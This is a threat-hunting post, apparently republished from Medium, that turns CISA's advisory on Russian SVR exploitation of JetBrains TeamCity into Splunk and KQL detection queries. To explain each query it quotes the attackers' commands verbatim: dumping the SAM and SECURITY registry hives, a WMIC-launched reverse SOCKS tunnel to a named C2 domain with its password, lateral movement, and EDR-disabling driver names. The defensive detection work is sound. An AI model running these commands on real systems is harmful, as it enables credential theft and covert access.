Hunting SVR — Russian Foreign Intelligence Service (SVR) Exploiting JetBrains TeamCity CVE Globally
Behavior Patterns
SVR cyber operations pose a persistent threat to public and private organizations’ networks globally. Since 2013, cybersecurity companies and governments have reported on SVR operations targeting victim networks to steal confidential and proprietary information. A decade later, the authoring agencies can infer a long-term targeting pattern aimed at collecting, and enabling the collection of, foreign intelligence, a broad concept that for Russia encompasses information on the politics, economics, and military of foreign states; science and technology; and foreign counterintelligence. The SVR also conducts cyber operations targeting technology companies that enable future cyber operations
…In this newly attributed operation targeting networks hosting TeamCity servers, the SVR demonstrably continues its practice of targeting technology companies. By choosing to exploit CVE-2023–42793, a software development program, the authoring agencies assess the SVR could benefit from access to victims, particularly by allowing the threat actors to compromise the networks of dozens of software developers. JetBrains issued a patch for this CVE in mid-September 2023, limiting the SVR’s operation to the exploitation of unpatched, Internet-reachable TeamCity servers. While the authoring agencies assess the SVR has not yet used its accesses to software developers to access customer networks and is likely still in the preparatory phase of its operation, having access to these companies’ networks presents the SVR with opportunities to enable hard-to- detect command and control (C2) infrastructure.
The playbook is written based on the CISA Alert Code AA23–347A and contains corresponding Sigma Rules for threat hunting. It contains additionally a threat hunting Sigma Rule opportunity for living off the land and exploitation commands exploiting active directory and one for the EDRSandblast detection, that the SVR is also using in some cases.
Host Reconnaissance
whoami
Initial observations show the SVR used the following basic, built-in commands to perform host reconnaissance [T1033]:
whoami /priv
whoami /all
whoami /groups
whoami /domain
Privilege information listing via whoami
Splunk:
index=* source=”WinEventLog:*” AND ((Image=”*whoami.exe’”) AND (CommandLine=”*priv*” OR CommandLine=”*Priv*”))
Whoami.exe Russian SVR JetBrains
Sigma-Rules/Whoami.exe Russian SVR JetBrains.yml at Russian-Threat-Actor · Schmouni242/Sigma-Rules
MDE KQL:
DeviceProcessEvents | where ((FolderPath endswith @’\whoami.exe’ or InitiatingProcessVersionInfoOriginalFileName =~ @’whoami.exe’ or ProcessVersionInfoOriginalFileName =~ @’whoami.exe’) and (ProcessCommandLine contains @’ /priv’ or ProcessCommandLine contains @’ /all’ or ProcessCommandLine contains @’ /groups’ or ProcessCommandLine contains @’ /domain’))
DC listing via nltest
nltest -dclist
nltest -dsgetd
Sigma-Rules/DC listing via nltest.yml at Russian-Threat-Actor · Schmouni242/Sigma-Rules
MDE KQL:
DeviceProcessEvents | where (FolderPath endswith @’nltest.exe’ and (ProcessCommandLine matches regex @’(?i).*dclist\:.*|.*DCLIST\:.*|.*dsgetdc\:.*|.*DSGETDC\:.*’))
DLL execution via WMI
Sigma-Rules/DLL execution via WMI.yml at Russian-Threat-Actor · Schmouni242/Sigma-Rules
MDE KQL:
DeviceProcessEvents | where (FolderPath endswith @’WMIC.exe’ and (ProcessCommandLine contains @’call’ or ProcessCommandLine contains @’rundll32'))
Splunk:
index=* source=”WinEventLog:*” AND ((Image=”*WMIC.exe”) AND (CommandLine=”*call*” OR CommandLine=”*rundll32*”))
Process with connect and pass as args
MDE KQL:
DeviceProcessEvents | where (ProcessCommandLine contains @’pass’ and ProcessCommandLine contains @’connect’)
Splunk:
index=* source=”WinEventLog:*” AND ((CommandLine=”*pass*”) AND (CommandLine=”*connect*”))
Service or Drive enumeration via powershell
MDE KQL:
DeviceEvents | where ActionType == “PowerShellCommand” | where (((AdditionalFields contains @’Get-WmiObject’ or InitiatingProcessCommandLine contains @’Get-WmiObject’) and (AdditionalFields contains @’-Class’ or InitiatingProcessCommandLine contains @’-Class’) and (AdditionalFields contains @’Win32_Service’ or InitiatingProcessCommandLine contains @’Win32_Service’)) or ((AdditionalFields contains @’Get-WindowsDriver’ or InitiatingProcessCommandLine contains @’Get-WindowsDriver’) and (AdditionalFields contains @’-Online’ or InitiatingProcessCommandLine contains @’-Online’) and (AdditionalFields contains @’-All’ or InitiatingProcessCommandLine contains @’-All’)))
Splunk:
index=* source=”WinEventLog:*” AND (((ScriptBlockText=”*Get-WmiObject*”) AND (ScriptBlockText=”*-Class*”) AND (ScriptBlockText=”*Win32_Service*”)) OR ((ScriptBlockText=”*Get-WindowsDriver*”) AND (ScriptBlockText=”*-Online*”) AND (ScriptBlockText=”*-All*”)))
DLL names used by SVR for GraphicalProton backdoor
GraphicalProton is a simplistic backdoor that uses OneDrive, Dropbox, and randomly generated BMPs [T1027.001] to exchange data with the SVR operator. After execution, GraphicalProton gathers environment information such as active TCP/UDP connections [T1049], running processes [T1049], as well as user, host, and domain names [T1590]. OneDrive is used as a primary communication channel while Dropbox is treated as a backup channel [T1567]. API keys are hardcoded into the malware. When communicating with cloud services, GraphicalProton generates a randomly named directory which is used to store infection-specific BMP files — with both commands and results [T1564.001]. Directory name is re-randomized each time the GraphicalProton process is started.
MDE KQL:
DeviceImageLoadEvents | where (FolderPath endswith @’AclNumsInvertHost.dll’ or FolderPath endswith @’ModeBitmapNumericAnimate.dll’ or FolderPath endswith @’UnregisterAncestorAppendAuto.dll’ or FolderPath endswith @’DeregisterSeekUsers.dll’ or FolderPath endswith @’ScrollbarHandleGet.dll’ or FolderPath endswith @’PerformanceCaptionApi.dll’ or FolderPath endswith @’WowIcmpRemoveReg.dll’ or FolderPath endswith @’BlendMonitorStringBuild.dll’ or FolderPath endswith @’HandleFrequencyAll.dll’ or FolderPath endswith @’HardSwapColor.dll’ or FolderPath endswith @’LengthInMemoryActivate.dll’ or FolderPath endswith @’ParametersNamesPopup.dll’ or FolderPath endswith @’ModeFolderSignMove.dll’ or FolderPath endswith @’ChildPaletteConnected.dll’ or FolderPath endswith @’AddressResourcesSpec.dll’)
Splunk:
index=* source=”WinEventLog:*” AND (ImageLoaded=”*AclNumsInvertHost.dll” OR ImageLoaded=”*ModeBitmapNumericAnimate.dll” OR ImageLoaded=”*UnregisterAncestorAppendAuto.dll” OR ImageLoaded=”*DeregisterSeekUsers.dll” OR ImageLoaded=”*ScrollbarHandleGet.dll” OR ImageLoaded=”*PerformanceCaptionApi.dll” OR ImageLoaded=”*WowIcmpRemoveReg.dll” OR ImageLoaded=”*BlendMonitorStringBuild.dll” OR ImageLoaded=”*HandleFrequencyAll.dll” OR ImageLoaded=”*HardSwapColor.dll” OR ImageLoaded=”*LengthInMemoryActivate.dll” OR ImageLoaded=”*ParametersNamesPopup.dll” OR ImageLoaded=”*ModeFolderSignMove.dll” OR ImageLoaded=”*ChildPaletteConnected.dll” OR ImageLoaded=”*AddressResourcesSpec.dll”)
Sensitive registry entries saved to file
In order to exfiltrate Windows Registry, the SVR saved hives into files [T1003.002], packed them, and then exfiltrated them using a backdoor capability. it used “reg save” to save SYSTEM, SAM and SECURITY registry hives, and used powershell to stage .zip archives in the
C:\Windows\Temp\ directory:
reg save HKLM\SYSTEM “”C:\Windows\temp\1\sy.sa”” /y
reg save HKLM\SAM “”C:\Windows\temp\1\sam.sa”” /y
reg save HKLM\SECURITY “”C:\Windows\temp\1\se.sa”” /y
powershell Compress-Archive -Path C:\Windows\temp\1\ -DestinationPath C:\Windows\temp\s.zip -Force & del C:\Windows\temp\1 /F /Q
MDE KQL:
DeviceProcessEvents | where (FolderPath endswith @’reg.exe’ and ProcessCommandLine contains @’save’ and (ProcessCommandLine matches regex @’(?i).*HKLM\\SYSTEM.*|.*HKLM\\SECURITY.*|.*HKLM\\SAM.*’) and (ProcessCommandLine matches regex @’(?i).*sy\.sa.*|.*sam\.sa.*|.*se\.sa.*’))
Compressing files from temp to temp
MDE KQL:
DeviceEvents | where ActionType == “PowerShellCommand” | where ((AdditionalFields matches regex @’(?i).*Compress\-Archive.*Path.*Windows\\[Tt]{1}emp\\[1–9]{1}.*DestinationPath.*Windows\\[Tt]{1}emp\\.*’) or (InitiatingProcessCommandLine matches regex @’(?i).*Compress\-Archive.*Path.*Windows\\[Tt]{1}emp\\[1–9]{1}.*DestinationPath.*Windows\\[Tt]{1}emp\\.*’))
Scheduled tasks names used by SVR for Graphical backdoor
Splunk:
index=* source=”WinEventLog:*” AND ((EventCode=”4698" OR EventCode=”4699" OR EventCode=”4702") AND (TaskName=”\\Microsoft\\Windows\\IISUpdateService” OR TaskName=”\\Microsoft\\Windows\\WindowsDefenderService” OR TaskName=”\\Microsoft\\Windows\\WindowsDefenderService2" OR TaskName=”\\Microsoft\\DefenderService” OR TaskName=”\\Microsoft\\Windows\\DefenderUPDService” OR TaskName=”\\Microsoft\\Windows\\WiMSDFS” OR TaskName=”\\Microsoft\\Windows\\Application Experience\\StartupAppTaskCkeck” OR TaskName=”\\Microsoft\\Windows\\Windows Error Reporting\\SubmitReporting” OR TaskName=”\\Microsoft\\Windows\\Windows Defender\\Defender Update Service” OR TaskName=”\\WindowUpdate” OR TaskName=”\\Microsoft\\Windows\\Windows Error Reporting\\CheckReporting” OR TaskName=”\\Microsoft\\Windows\\Application Experience\\StartupAppTaskCheck” OR TaskName=”\\Microsoft\\Windows\\Speech\\SpeechModelInstallTask” OR TaskName=”\\Microsoft\\Windows\\Windows Filtering Platform\\BfeOnServiceStart” OR TaskName=”\\Microsoft\\Windows\\Data Integrity Scan\\Data Integrity Update” OR TaskName=”\\Microsoft\\Windows\\WindowsUpdate\\Scheduled AutoCheck” OR TaskName=”\\Microsoft\\Windows\\ATPUpd” OR TaskName=”\\Microsoft\\Windows\\Windows Defender\\Service Update” OR TaskName=”\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Check” OR TaskName=”\\Microsoft\\Windows\\WindowsUpdate\\Scheduled AutoCheck” OR TaskName=”\\Defender” OR TaskName=”\\defender” OR TaskName=”\\Microsoft\\Windows\\IISUpdateService” OR TaskName=”\\Microsoft\\Windows\\WindowsDefenderService” OR TaskName=”\\Microsoft\\Windows\\WindowsDefenderService2" OR TaskName=”\\Microsoft\\DefenderService” OR TaskName=”\\Microsoft\\Windows\\DefenderUPDService” OR TaskName=”\\Microsoft\\Windows\\WiMSDFS” OR TaskName=”\\Microsoft\\Windows\\Application Experience\\StartupAppTaskCkeck” OR TaskName=”\\Microsoft\\Windows\\Windows Error Reporting\\SubmitReporting” OR TaskName=”\\Microsoft\\Windows\\Windows Defender\\Defender Update Service” OR TaskName=”\\WindowUpdate” OR TaskName=”\\Microsoft\\Windows\\Windows Error Reporting\\CheckReporting” OR TaskName=”\\Microsoft\\Windows\\Application Experience\\StartupAppTaskCheck” OR TaskName=”\\Microsoft\\Windows\\Speech\\SpeechModelInstallTask” OR TaskName=”\\Microsoft\\Windows\\Windows Filtering Platform\\BfeOnServiceStart” OR TaskName=”\\Microsoft\\Windows\\Data Integrity Scan\\Data Integrity Update” OR TaskName=”\\Microsoft\\Windows\\WindowsUpdate\\Scheduled AutoCheck” OR TaskName=”\\Microsoft\\Windows\\ATPUpd” OR TaskName=”\\Microsoft\\Windows\\Windows Defender\\Service Update” OR TaskName=”\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Check” OR TaskName=”\\Microsoft\\Windows\\WindowsUpdate\\Scheduled AutoCheck” OR TaskName=”\\Defender” OR TaskName=”\\defender”))
MDE KQL:
DeviceProcessEvents | where ((FolderPath endswith @’schtasks.exe’ and (ProcessCommandLine contains @’IISUpdateService’ or ProcessCommandLine contains @’WindowsDefenderService’ or ProcessCommandLine contains @’WindowsDefenderService2' or ProcessCommandLine contains @’DefenderService’ or ProcessCommandLine contains @’DefenderUPDService’ or ProcessCommandLine contains @’WiMSDFS’ or ProcessCommandLine contains @’StartupAppTaskCkeck’ or ProcessCommandLine contains @’SubmitReporting’ or ProcessCommandLine contains @’Defender Update Service’ or ProcessCommandLine contains @’WindowUpdate’ or ProcessCommandLine contains @’CheckReporting’ or ProcessCommandLine contains @’StartupAppTaskCheck’ or ProcessCommandLine contains @’SpeechModelInstallTask’ or ProcessCommandLine contains @’BfeOnServiceStart’ or ProcessCommandLine contains @’Data Integrity Update’ or ProcessCommandLine contains @’Scheduled AutoCheck’ or ProcessCommandLine contains @’ATPUpd’ or ProcessCommandLine contains @’Service Update’ or ProcessCommandLine contains @’Scheduled Check’ or ProcessCommandLine contains @’Scheduled AutoCheck’ or ProcessCommandLine contains @’Defender’ or ProcessCommandLine contains @’defender’)) or (FolderPath endswith @’schtasks.exe’ and ((ProcessCommandLine matches regex @’(?i).*Defender\sUpdate\sService.*’) or (ProcessCommandLine matches regex @’(?i).*Data\sIntegrity\sUpdate.*’) or (ProcessCommandLine matches regex @’(?i).*Scheduled\sAutoCheck.*’) or (ProcessCommandLine matches regex @’(?i).*Service\sUpdate.*’) or (ProcessCommandLine matches regex @’(?i).*Scheduled\sCheck.*’) or (ProcessCommandLine matches regex @’(?i).*Scheduled\sAutoCheck.*’))))
Tactics Used to Avoid Detection
To avoid detection, the SVR used a “Bring Your Own Vulnerable Driver” [T1068] technique to disable or outright kill endpoint detection and response (EDR) and antivirus (AV) software [T1562.001]. This was done using an open source project called “EDRSandBlast.” The authoring agencies have observed the SVR using EDRSandBlast to remove protected process light (PPL) protection, which is used for controlling and protecting running processes and protecting them from infection. The actors then inject code into AV/EDR processes for a small subset of victims [T1068].
MDE KQL:
DeviceFileEvents | where (InitiatingProcessFolderPath endswith @’WNBIOS.sys’ or InitiatingProcessFolderPath endswith @’ntkrnlmp.pdb’ or InitiatingProcessFolderPath endswith @’GDRV.sys’ or InitiatingProcessFolderPath endswith @’RTCore64.sys’ or InitiatingProcessFolderPath endswith @’DBUtil_2_3.sys’)
Splunk:
index=* source=”WinEventLog:*” AND (Image=”*WNBIOS.sys” OR Image=”*ntkrnlmp.pdb” OR Image=”*GDRV.sys” OR Image=”*RTCore64.sys” OR Image=”*DBUtil_2_3.sys”)
Further Recon Hunting and Redteaming opportunities
After the SVR built a secure foothold and gained an awareness of a victim’s TeamCity server, it then focused on network reconnaissance [T1590.004]. The SVR performed network reconnaissance using a mix of built-in commands and additional tools, such as port scanner and PowerSploit, which it launched into memory [T1046]. The SVR executed the following PowerSploit commands:
Get-NetComputer
Get-NetGroup
Get-NetUser -UACFilter NOT_ACCOUNTDISABLE | select samaccountname, description, pwdlastset, logoncount, badpwdcount”
Get-NetDiDomain
Get-AdUser
Get-DomainUser -UserName
Get-NetUser -PreauthNotRequire
Get-NetComputer | select samaccountname
Get-NetUser -SPN | select serviceprincipalname
Living Off The Land and Exploitation Active Directory

Commands like above are used by threat actors when they try to get further information about the Active Directory to move laterally. Further commands could be found here LOLAD.
The LOLAD and Exploitation project provides a comprehensive collection of Active Directory techniques, commands, and functions that can be used natively to support offensive security operations and Red Team exercises. These techniques leverage AD’s built-in tools to conduct reconnaissance, privilege escalation, and lateral movement, among other tactics. Understanding these methods helps defenders strengthen AD configurations and improve monitoring capabilities.
I’ve written for all commands a Sigma Rule for threat hunting.
MDE KQL:
DeviceProcessEvents | where (((FolderPath endswith @’\powershell.exe’ or FolderPath endswith @’\pwsh.exe’ or FolderPath endswith @’\powershell_ise.exe’) or ProcessVersionInfoOriginalFileName in~ (@’PowerShell.EXE’, @’pwsh.dll’)) and (ProcessCommandLine contains @’Get-AD ‘ or ProcessCommandLine contains @’Get-GPO’ or ProcessCommandLine contains @’Search-ADAccount’ or ProcessCommandLine contains @’Get-NetGroup’ or ProcessCommandLine contains @’Get-NetDomain’ or ProcessCommandLine contains @’Get-NetDomainTrust’ or ProcessCommandLine contains @’Get-LocalGroupMember’ or ProcessCommandLine contains @’Get-NetUser’ or ProcessCommandLine contains @’Get-DomainPolicy’ or ProcessCommandLine contains @’Get-NetSession’ or ProcessCommandLine contains @’Get-DnsServer’ or ProcessCommandLine contains @’Get-ADReplicationSubnet’ or ProcessCommandLine contains @’Get-EventLog’ or ProcessCommandLine contains @’Clear-EventLog’ or ProcessCommandLine contains @’Backup-GPO’))
Splunk:
index=* source=”WinEventLog:Microsoft-Windows-Sysmon/Operational” AND (((NewProcessName=”*\\powershell.exe” OR NewProcessName=”*\\pwsh.exe” OR NewProcessName=”*\\powershell_ise.exe”) OR (OriginalFileName=”PowerShell.EXE” OR OriginalFileName=”pwsh.dll”)) AND (CommandLine=”*Get-AD *” OR CommandLine=”*Get-GPO*” OR CommandLine=”*Search-ADAccount*” OR CommandLine=”*Get-NetGroup*” OR CommandLine=”*Get-NetDomain*” OR CommandLine=”*Get-NetDomainTrust*” OR CommandLine=”*Get-LocalGroupMember*” OR CommandLine=”*Get-NetUser*” OR CommandLine=”*Get-DomainPolicy*” OR CommandLine=”*Get-NetSession*” OR CommandLine=”*Get-DnsServer*” OR CommandLine=”*Get-ADReplicationSubnet*” OR CommandLine=”*Get-EventLog*” OR CommandLine=”*Clear-EventLog*” OR CommandLine=”*Backup-GPO*”))
Tunneling into Compromised Environments
In selected environments the SVR used an additional tool named, “rr.exe” — a modified open source reverse socks tunneler named Rsockstun — to establish a tunnel to the C2 infrastructure [T1572]. The authoring agencies are aware of the following infrastructure used in conjunction with “rr.exe”:
65.20.97[.]203:443
Poetpages[.]com:8443
The SVR executed Rsockstun either in memory or using the Windows Management Instrumentation Command Line (WMIC) [T1047] utility after dropping it to disk:
wmic process call create “C:\Program Files\Windows Defender Advanced Threat Protection\Sense.exe -connect poetpages.com -pass M554–0sddsf2@34232fsl45t31”
Lateral Movement The SVR used WMIC to facilitate lateral movement [T1047],[T1210].
wmic /node:”””” /user:””” /password:”””” process call create “”rundll32 C:\Windows\system32\AclNumsInvertHost.dll AclNumsInvertHost””
The SVR also modified DisableRestrictedAdmin key to enable remote connections [T1210]. It modified Registry using the following reg command:
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d “0” /f
Latest Recommendation October 2024
<a href="https://medium.com/media/21bcbcc7c830773c45b608bc0ffa7817/href">https://medium.com/media/21bcbcc7c830773c45b608bc0ffa7817/href</a>
Hunting SVR — Russian Foreign Intelligence Service (SVR) Exploiting JetBrains TeamCity CVE Globally was originally published in Detect FYI on Medium, where people are continuing the conversation by highlighting and responding to this story.
Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.
Enroll Now and Save 10%: Coupon Code MWNEWS10
Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.